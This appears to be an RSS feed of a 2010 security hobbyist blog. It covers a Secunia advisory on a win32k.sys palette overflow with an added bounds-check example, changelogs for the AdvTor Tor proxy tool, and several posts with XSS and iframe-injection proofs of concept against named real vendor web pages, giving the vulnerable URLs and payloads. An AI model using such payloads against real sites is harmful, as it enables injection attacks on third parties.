nemesis.te-home.net http://nemesis.te-home.net <![CDATA[Patch for CreateDIBPalette in Win32k.sys for Windows 2000 and XP (all Service Packs)]]> http://nemesis.te-home.net/
Secunia wrote:
Secunia Advisory SA40870

Release Date: 2010-08-06



Criticality level: Less critical
Impact: Privilege escalation
Where: Local system

Solution Status: Unpatched


Operating System: Microsoft Windows 7
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2008
Microsoft Windows Storage Server 2003
Microsoft Windows Vista
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional



CVE Reference(s): No CVE references.


Description
Arkon has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to gain escalated privileges.

The vulnerability is caused due to a boundary error in win32k.sys within the "CreateDIBPalette()" function when copying colour values into a buffer allocated with a fixed size when creating the DIB palette. This can be exploited via the "GetClipboardData()" API to cause a buffer overflow by specifying a large number of colours (greater than 256) via the "biClrUsed" field in a BITMAPINFOHEADER structure.

Successful exploitation may allow execution of arbitrary code with kernel privileges.

The vulnerability is confirmed in fully patched versions of Windows XP SP3, Windows Server 2003 R2 Enterprise SP2, Windows Vista Business SP1, Windows 7, and Windows Server 2008 SP2.


Source: Microsoft Windows win32k.sys Driver "CreateDIBPalette()" Buffer Overflow

I can confirm that all Service Packs of Windows 2000 are also vulnerable. The following patch is for Win32k.sys and it converts biClrUsed from Word to Byte.

Download:

This program is a proof of concept and is provided "as is". Any express or implied warranties are disclaimed. In no event shall the author be liable for any damages caused arising in any way out of the use of this software, even if advised of the possibility of such damage.
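For readers who want to see the missing bound as code, here is an added user-mode example (my own, not from the advisory, the patch above, or Microsoft) of the check a DIB palette copier needs: the entry count derived from biBitCount and biClrUsed is validated against both the bit depth and the fixed 256-entry destination before anything is copied. The struct layout follows wingdi.h; palette_entry_count, copy_palette and demo_copy are names I chose, and the colour table is constructed sample data.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* BITMAPINFOHEADER as laid out in wingdi.h (fields after biBitCount are
 * kept for layout fidelity; only biBitCount and biClrUsed matter here). */
typedef struct {
    uint32_t biSize;
    int32_t  biWidth;
    int32_t  biHeight;
    uint16_t biPlanes;
    uint16_t biBitCount;
    uint32_t biCompression;
    uint32_t biSizeImage;
    int32_t  biXPelsPerMeter;
    int32_t  biYPelsPerMeter;
    uint32_t biClrUsed;
    uint32_t biClrImportant;
} bmp_info_header;

typedef struct { uint8_t rgbBlue, rgbGreen, rgbRed, rgbReserved; } rgb_quad;

#define MAX_PALETTE_ENTRIES 256   /* size of the fixed palette buffer */

/* Number of colour-table entries a header may legitimately carry, or -1.
 * Indexed depths (1/4/8 bpp) allow at most 2^bpp entries, with 0 meaning
 * "all of them"; deeper formats may carry an optional palette that still
 * never exceeds 256 entries. Only uncompressed depths are handled. */
int palette_entry_count(const bmp_info_header *h)
{
    uint32_t max_for_depth;
    switch (h->biBitCount) {
    case 1: case 4: case 8:
        max_for_depth = 1u << h->biBitCount;
        if (h->biClrUsed == 0)
            return (int)max_for_depth;
        break;
    case 16: case 24: case 32:
        max_for_depth = MAX_PALETTE_ENTRIES;
        break;
    default:
        return -1;
    }
    /* This is the bound the advisory says CreateDIBPalette() did not enforce. */
    if (h->biClrUsed > max_for_depth)
        return -1;
    return (int)h->biClrUsed;
}

/* Copy the colour table into the fixed-size buffer, refusing any header
 * whose entry count is out of range or larger than the entries actually
 * supplied. Returns the number of entries copied or -1. */
int copy_palette(const bmp_info_header *h, const rgb_quad *src, size_t src_entries,
                 rgb_quad dst[MAX_PALETTE_ENTRIES])
{
    int n = palette_entry_count(h);
    if (n < 0 || (size_t)n > src_entries)
        return -1;
    memcpy(dst, src, (size_t)n * sizeof(rgb_quad));
    return n;
}

/* Helper for experiments: build a constructed header and a colour table of
 * src_entries entries and run them through copy_palette(). */
int demo_copy(uint16_t bpp, uint32_t clr_used, size_t src_entries)
{
    static rgb_quad src[1024];            /* constructed sample colour table */
    rgb_quad dst[MAX_PALETTE_ENTRIES];
    bmp_info_header h;
    if (src_entries > sizeof src / sizeof src[0])
        return -1;
    memset(&h, 0, sizeof h);
    h.biSize = sizeof h;                  /* 40 bytes, as in wingdi.h */
    h.biPlanes = 1;
    h.biBitCount = bpp;
    h.biClrUsed = clr_used;
    for (size_t i = 0; i < src_entries; i++) {
        src[i].rgbRed = (uint8_t)i;
        src[i].rgbGreen = src[i].rgbBlue = src[i].rgbReserved = 0;
    }
    return copy_palette(&h, src, src_entries, dst);
}

int main(void)
{
    printf("8 bpp, biClrUsed=0    -> %d entries\n", demo_copy(8, 0, 256));
    printf("8 bpp, biClrUsed=1000 -> %d (rejected)\n", demo_copy(8, 1000, 1000));
    return 0;
}
```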
]]>
http://nemesis.te-home.net/ Mon, 9 Aug 2010 18:47:34 GMT 658409101
<![CDATA[AdvTor 0.1.0.3]]> http://nemesis.te-home.net/
http://img121.imageshack.us/img121/8725/windows764.png

Changes:
  • corrected: if Auto-Refresh was disabled, initialization progress was no longer shown
  • corrected: if Auto-Refresh was disabled, all log messages were shown as popup MessageBoxes
  • corrected: ASLR detection problems in Windows 2003 (thanks to RoLex for helping with tests)
  • corrected: the nickname was reset to local computer name if server options were changed (thanks to The Architect for reporting this error)
  • AdvTor can now force programs that use asynchronous sockets to use Tor
  • AdvTor also intercepts process creation functions, to set proxy restrictions on child processes created by a restricted process
  • if AdvTor.exe is renamed, AdvTor.dll must also be renamed


Download:



Testing http://deanonymizer.com under the 64-bit version of Windows 7:

AdvTor.exe wrote:
[20:16:57] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:17:04] [proxy] Connection request for deanonymizer.com:80 .
[20:17:05] [proxy] Connection request for deanonymizer.com:80 .
[20:17:10] [proxy] Connection request for deanonymizer.com:80 .
[20:17:11] [proxy] Connection request for deanonymizer.com:80 .
[20:17:12] [proxy] Connection request for deanonymizer.com:80 .
[20:17:13] [proxy] Connection request for deanonymizer.com:80 .
[20:17:13] [proxy] Connection request for deanonymizer.com:80 .
[20:17:14] [proxy] Restricted process iexplore.exe created a new process with PID 2008 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=1&uid=9525139796792197" /prefetch:10
[20:17:14] [proxy] Setting proxy restrictions for process with PID 2008 (wmplayer.exe)
[20:17:14] [proxy] wmplayer.exe [WMNetMgr.dll]: Attempt to bypass proxy settings with address 66.109.20.52:554 .
[20:17:14] [proxy] Connection request for 66.109.20.52:554 .
[20:17:14] [proxy] wmplayer.exe [WMNetMgr.dll]: Attempt to bypass proxy settings with address 66.109.20.52:554 .
[20:17:14] [proxy] Connection request for 66.109.20.52:554 .
[20:17:15] [proxy] Connection request for 66.109.20.52:80 .
[20:17:16] [proxy] Connection request for 66.109.20.52:80 .
[20:17:22] [proxy] Connection request for deanonymizer.com:80 .
[20:17:34] [proxy] Connection request for deanonymizer.com:80 .
[20:17:34] [proxy] Connection request for deanonymizer.com:80 .
[20:17:36] [proxy] Restricted process iexplore.exe created a new process with PID 2716 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=2&uid=9525139796792197" /prefetch:10
[20:17:36] [proxy] Setting proxy restrictions for process with PID 2716 (wmplayer.exe)
[20:17:44] [proxy] Connection request for deanonymizer.com:80 .
[20:17:47] [proxy] Connection request for deanonymizer.com:80 .
[20:17:47] [proxy] Connection request for deanonymizer.com:80 .
[20:17:48] [proxy] Restricted process iexplore.exe created a new process with PID 912 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=3&uid=9525139796792197" /prefetch:10
[20:17:48] [proxy] Setting proxy restrictions for process with PID 912 (wmplayer.exe)
[20:17:56] [proxy] Connection request for deanonymizer.com:80 .
[20:17:59] [proxy] Connection request for deanonymizer.com:80 .
[20:17:59] [proxy] Connection request for deanonymizer.com:80 .
[20:18:02] [proxy] Connection request for deanonymizer.com:80 .
[20:18:06] [proxy] Connection request for deanonymizer.com:80 .
[20:18:09] [proxy] Connection request for deanonymizer.com:80 .
[20:18:10] [proxy] Connection request for deanonymizer.com:80 .
[20:18:11] [proxy] Connection request for deanonymizer.com:80 .
[20:18:11] [proxy] Connection request for deanonymizer.com:80 .
[20:18:19] [proxy] Connection request for deanonymizer.com:80 .
[20:18:23] [proxy] Connection request for deanonymizer.com:80 .
[20:18:26] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:40] [proxy] Connection request for deanonymizer.com:80 .
[20:18:42] [proxy] Connection request for deanonymizer.com:80 .
[20:18:42] [proxy] Connection request for deanonymizer.com:80 .
[20:18:52] [proxy] Connection request for deanonymizer.com:80 .
[20:18:54] [proxy] Connection request for deanonymizer.com:80 .
[20:18:54] [proxy] Connection request for deanonymizer.com:80 .
[20:19:05] [proxy] Connection request for deanonymizer.com:80 .
[20:19:06] [proxy] Connection request for deanonymizer.com:80 .
[20:19:06] [proxy] Connection request for deanonymizer.com:80 .
[20:19:17] [proxy] Connection request for deanonymizer.com:80 .
[20:19:20] [proxy] Connection request for deanonymizer.com:80 .
[20:19:20] [proxy] Connection request for deanonymizer.com:80 .
[20:19:32] [proxy] Connection request for deanonymizer.com:80 .
[20:19:35] [proxy] Connection request for deanonymizer.com:80 .
[20:19:35] [proxy] Connection request for deanonymizer.com:80 .
[20:19:49] [proxy] Connection request for deanonymizer.com:80 .
[20:19:53] [proxy] Connection request for deanonymizer.com:80 .
[20:19:53] [proxy] Connection request for deanonymizer.com:80 .
[20:20:05] [proxy] Connection request for deanonymizer.com:80 .
[20:20:09] [proxy] Connection request for deanonymizer.com:80 .
[20:20:09] [proxy] Connection request for deanonymizer.com:80 .
[20:20:13] [proxy] Connection request for www.apple.com:80 .
[20:20:20] [proxy] Connection request for qtinstall.apple.com:80 .
[20:20:25] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:20:34] [proxy] Connection request for 66.109.20.52:80 .
[20:20:37] [proxy] Connection request for 66.109.20.52:80 .
[20:20:45] [proxy] Connection request for deanonymizer.com:80 .
[20:20:56] [proxy] Connection request for deanonymizer.com:80 .
[20:20:56] [proxy] Connection request for deanonymizer.com:80 .
[20:21:00] [proxy] Connection request for www.apple.com:80 .
[20:21:11] [proxy] Connection request for qtinstall.apple.com:80 .
[20:21:19] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:21:26] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:26] [proxy] Connection request for 66.109.20.52:21 .
[20:21:28] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:28] [proxy] Connection request for 66.109.20.52:21 .
[20:21:29] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:29] [proxy] Connection request for 66.109.20.52:21 .
[20:21:36] [proxy] Connection request for deanonymizer.com:80 .
[20:21:37] [proxy] Connection request for deanonymizer.com:80 .
[20:21:37] [proxy] Connection request for deanonymizer.com:80 .
[20:21:38] [proxy] Connection request for www.apple.com:80 .
[20:21:39] [proxy] Connection request for qtinstall.apple.com:80 .
[20:21:40] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:21:50] [proxy] Connection request for deanonymizer.com:80 .
[20:21:52] [proxy] Connection request for deanonymizer.com:80 .
[20:21:58] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for xerobank.com:80 .
[20:22:04] [proxy] Connection request for maps.google.com:80 .
[20:22:06] [warn] Your application (using socks4 to port 443) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:22:06] [proxy] Connection request for 88.198.80.243:443 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:09] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .


http://img830.imageshack.us/img830/8322/ie1.png


]]>
http://nemesis.te-home.net/ Tue, 10 Aug 2010 18:16:34 GMT 3655199975
<![CDATA[AVG.pl - XSS & IFrame Injection]]> http://nemesis.te-home.net/index.html http://www.avg.pl/rejestracja.html

PoC:

XSS -
Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


http://img826.imageshack.us/img826/8850/xss.png

IFrame Injection -
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img228.imageshack.us/img228/2923/iframe.png
']['€AM€LiT€]]>
http://nemesis.te-home.net/index.html Fri, 13 Aug 2010 08:19:41 GMT 2190724107
<![CDATA[Kaspersky.pl, F-Secure.com.pl - XSS & IFrame Injection]]> http://nemesis.te-home.net/ http://www.kaspersky.pl/oem.html

PoC: http://img62.imageshack.us/img62/7577/kasperskyf.png

Vulnerable page at f-secure.com.pl - http://f-secure.com.pl/order.html?action=confirm

PoC:

XSS -
Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


http://img829.imageshack.us/img829/8783/fsecure.png

IFrame Injection -
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img245.imageshack.us/img245/9003/fsecure2.png


']['€AM€LiT€]]>
http://nemesis.te-home.net/ Fri, 13 Aug 2010 09:21:19 GMT 3486801517
<![CDATA[Installing KB980436 Security Update for SChannel.dll on Windows XP (All Service Packs)]]> http://nemesis.te-home.net/
microsoft.com wrote:
A security issue has been identified that could allow an unauthenticated remote attacker to compromise your system and gain control over it. You can help protect your system by installing this update from Microsoft. After you install this update, you may have to restart your system.


http://img256.imageshack.us/img256/1117/setuphasdetected.png

If you have an older and no longer supported OS, you can still install some security updates, including the updates for shell32.dll and for SChannel.dll, on any Service Pack of Windows XP. Not all updates can be installed this way, because some of them may expect functionality your OS doesn't have. Installing updates on the wrong OS may cause undesired effects and system instability.

Installing KB980436 on Windows XP:

]]>
http://nemesis.te-home.net/ Sat, 14 Aug 2010 12:47:41 GMT 2820594635
<![CDATA[AdvTor 0.1.0.4]]> http://nemesis.te-home.net/
http://img840.imageshack.us/img840/7223/chrome1.png

Usually, most people who change proxy settings in their browsers want to check their new IP. One of the most visited websites by people who want to check their IP is http://www.whatismyip.com . Unfortunately, most Tor exit nodes are banned there.

http://img829.imageshack.us/img829/9498/chrome2c.png

Can a website be DoS'ed with a request every 5 minutes? A website hosted on a dial-up connection can handle more. To bypass this ban, first we enable tracking for the ".whatismyip.com" address.

http://img826.imageshack.us/img826/1908/advtor1.png

We search for an exit node that is not banned.

http://img717.imageshack.us/img717/1797/advtor2.png

To make sure that every time you visit www.whatismyip.com the node that is not banned is used as the exit node, select the option to remember the exit for www.whatismyip.com.

http://img829.imageshack.us/img829/1730/advtor3.png

Changes:
  • GeoIP information is included as a pre-compiled search tree, GeoIP lookup functions are written in asm; also, a conversion program is included to convert a downloaded GeoIPCountryWhois.csv to geoip_c.h (csv2asm)
  • AdvTor now also intercepts CreateProcessAsUser from advapi32.dll
  • context menu from debug window has more options related to selected text if an address is found in it: track exit for selected_host (config option: TrackHostExits), remember/forget exit for selected_host (config option: AddressMap)
  • debug messages shown by AdvTor.dll have different severity levels
  • current exit node is shown in title bar
  • added a DialogBox for selecting a specific exit node or a country from which a random exit node will be chosen (accessible from "New identity" or from systray menu option "Advanced")
  • added a "Process Finder" DialogBox to help selecting a process by selecting a window it created
  • system tray menu has a list with 30 usable exit nodes
  • AdvTor verifies the minimum required version of AdvTor.dll (version 0.1.0.4 requires AdvTor.dll 0.1.0.4)


Download:


]]>
http://nemesis.te-home.net/ Sat, 21 Aug 2010 14:28:16 GMT 559786295
<![CDATA[Collection of XSS vulnerable websites]]> http://nemesis.te-home.net/

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.

This collection is to be continued, as well as a collection of websites that require the POST method for submitting a query.
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Fri, 27 Aug 2010 13:59:12 GMT 2984107369
<![CDATA[AdvTor 0.1.0.5]]> http://nemesis.te-home.net/
Changes:
  • corrected: if LoadLibrary failed in target process, it was still shown as intercepted
  • corrected: when unloading the AdvTor.dll, UnloadDLL did not wait for PipeThread to finish
  • corrected: high CPU usage if no running exit nodes were found (thanks to RoLex for reporting this problem)
  • corrected: system tray menus were not closed when the user clicked outside them
  • corrected: AdvTor.dll did not always close handles of remote threads
  • corrected: AdvTor.dll did not always free the memory it allocated in other processes
  • corrected: AdvTor.dll did not intercept process creation functions if the option to fake local time was disabled
  • corrected: intercepted processes that were not updated in GUI were not released when AdvTor exited
  • corrected: intercepting functions in suspended processes sometimes failed
  • corrected: AdvTor.dll could re-hook same procedure twice if a previous instance was terminated from task manager
  • corrected: AdvTor.exe will no longer attempt to intercept itself if the user selects it from process list (thanks to RoLex for reporting this error)
  • if no running exit nodes can be found for selected country, the notification message is shown only once, until a good exit node is found (thanks to RoLex for reporting this problem)
  • the confusing message "attempt to bypass proxy settings" is replaced with "redirecting connection from address" (thanks to Meka][Meka for reporting this problem)
  • system tray menu has a new submenu "Release" with all intercepted processes to allow unloading AdvTor.dll from them
  • AdvTor.dll now shows more information about interception failures
  • AdvTor.dll no longer loads user32.dll in intercepted processes
  • AdvTor.dll also intercepts functions gethostbyname, WSAAsyncGetHostByName, gethostbyaddr, WSAAsyncGetHostByAddr (Windows 2000+), getnameinfo, GetNameInfoW, getaddrinfo, GetAddrInfoW (Windows XP SP2+) (thanks to RoLex for helping with tests)
  • programs that are intercepted by AdvTor will have all DNS queries and reverse DNS queries resolved by OR network
  • programs that are intercepted can access .onion addresses; AdvTor.dll will resolve them to an IP within the range 127.16.* (localhost) and will keep a cache of generated IPs and their corresponding .onion addresses to use in connection requests
  • process tree also shows PID values when selecting a window
  • when AdvTor.dll sends a notification about an intercepted process that doesn't respect proxy settings, it also shows the PID for that process (requested by RoLex)
  • the lists with exit nodes will also have an entry "no exit", for those who want only to see where an intercepted program would connect, but without allowing it to connect or to send anything
  • added verification for "localhost" so an intercepted process won't try to use OR network to resolve it (Opera resolves "localhost" every time you save a file)
  • added verification for "wpad" to prevent vulnerable applications from using OR network to resolve it (Chrome, IE, Yahoo Messenger, etc.)

Download:



Version 0.1.0.5 of Advanced TOR can intercept all DNS / reverse DNS queries and redirect them to the OR network. If an application doesn't always use its configured proxy settings, a warning message is shown in the Debug window and its connection attempts and DNS queries are redirected. Those familiar with Tor know that Tor can work with addresses that cannot be resolved by normal name servers. Addresses of hidden services (*.onion) are valid only in the OR network; they are connect-only and do not resolve to an IP. In this particular case, when a program calls a resolve function for an .onion address, AdvTor will return a fake IP in the range 127.16.* and will keep a cache of fake IPs and their corresponding .onion addresses, which is consulted when a program wants to connect to one of these addresses.
As an example, let's see how we can use telnet to connect to the hidden wiki. First, we start a command prompt and use the "Force TOR" option to intercept its process creation functions and Winsock calls.

http://img691.imageshack.us/img691/8705/telnet1.png

To use telnet to connect to the hidden wiki, we can use the following command:
Code:
telnet kpvz7ki2v5agwt35.onion 80


http://img835.imageshack.us/img835/9609/telnet2.png

http://img189.imageshack.us/img189/1908/advtor1.png

When the connection is established, a valid HTTP request typed into telnet:
Code:
GET /wiki/index.php/Main_Page HTTP/1.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kpvz7ki2v5agwt35.onion
Connection: Keep-Alive



http://img685.imageshack.us/img685/7272/telnet3.png
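To make the .onion handling described above concrete, here is an added example (my own code, not AdvTor's) of such a cache: a name ending in .onion gets a fake address in 127.16.0.0/16 that maps back to the name at connect time, and localhost / wpad are kept off the OR network as the changelog says. The table size, the sequential host allocation and the function names are assumptions; the .onion name in main() is the one from the telnet example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp (POSIX) */

#define FAKE_NET      0x7F100000u   /* 127.16.0.0, the range the post names */
#define FAKE_NET_MASK 0xFFFF0000u   /* 127.16.0.0/16 */
#define MAX_ONION     256           /* assumed cache capacity */
#define MAX_NAME      64

typedef struct { char name[MAX_NAME]; uint32_t ip; } onion_entry;

static onion_entry g_cache[MAX_ONION];
static size_t      g_count;

void reset_onion_cache(void) { g_count = 0; }

static int ends_with_ci(const char *s, const char *suffix)
{
    size_t ls = strlen(s), lx = strlen(suffix);
    return ls >= lx && strcasecmp(s + ls - lx, suffix) == 0;
}

/* Names that must never be resolved through the OR network: the
 * "localhost" and "wpad" checks listed in the 0.1.0.5 changes. */
int resolve_via_tor(const char *name)
{
    return strcasecmp(name, "localhost") != 0 && strcasecmp(name, "wpad") != 0;
}

/* Fake IP (host byte order) for a .onion name, allocated on first sight and
 * returned unchanged afterwards. 0 for non-.onion names or a full cache. */
uint32_t fake_ip_for_onion(const char *name)
{
    if (!ends_with_ci(name, ".onion") || strlen(name) >= MAX_NAME)
        return 0;
    for (size_t i = 0; i < g_count; i++)
        if (strcasecmp(g_cache[i].name, name) == 0)
            return g_cache[i].ip;
    if (g_count >= MAX_ONION)
        return 0;
    uint32_t ip = FAKE_NET | (uint32_t)(g_count + 1);  /* first one is 127.16.0.1 */
    strcpy(g_cache[g_count].name, name);
    g_cache[g_count].ip = ip;
    g_count++;
    return ip;
}

/* Reverse lookup at connect() time: the name that goes into the SOCKS4A
 * request instead of the fake address. NULL if the address is not ours. */
const char *onion_for_fake_ip(uint32_t ip)
{
    if ((ip & FAKE_NET_MASK) != FAKE_NET)
        return NULL;
    for (size_t i = 0; i < g_count; i++)
        if (g_cache[i].ip == ip)
            return g_cache[i].name;
    return NULL;
}

int main(void)
{
    uint32_t ip = fake_ip_for_onion("kpvz7ki2v5agwt35.onion");
    printf("resolve -> %u.%u.%u.%u\n", (unsigned)(ip >> 24), (unsigned)((ip >> 16) & 255),
           (unsigned)((ip >> 8) & 255), (unsigned)(ip & 255));
    printf("connect -> %s\n", onion_for_fake_ip(ip));
    printf("resolve localhost via Tor? %d\n", resolve_via_tor("localhost"));
    return 0;
}
```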

See also:


]]>
http://nemesis.te-home.net/ Sun, 29 Aug 2010 13:20:40 GMT 3775427276
<![CDATA[avsoft.pl - XSS & IFrame Injection]]> http://nemesis.te-home.net/ http://www.avsoft.pl/pl/order.html?action=confirm

PoC:
Code:
"><h1>XSS BY TEAM ELITE</h1>
and
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img294.imageshack.us/img294/7066/avastqp.png
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Wed, 1 Sep 2010 18:09:07 GMT 995017569
<![CDATA[Kaspersky eStore Powered by Softkey.ru XSS Vulnerability]]> http://nemesis.te-home.net/ http://kaspersky.softkey.ru/basket/

PoC:

Code:
"<br /><br /><img src=http://nemesis.te-home.net/img/logo.jpg /><br /><a href=http://nemesis.te-home.net/>http://nemesis.te-home.net/</a><a b=


http://desmond.yfrog.com/Himg80/scaled.php?tn=0&server=80&filename=kaspbasket.png&xsize=640&ysize=640

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Thu, 2 Sep 2010 12:40:40 GMT 1225797292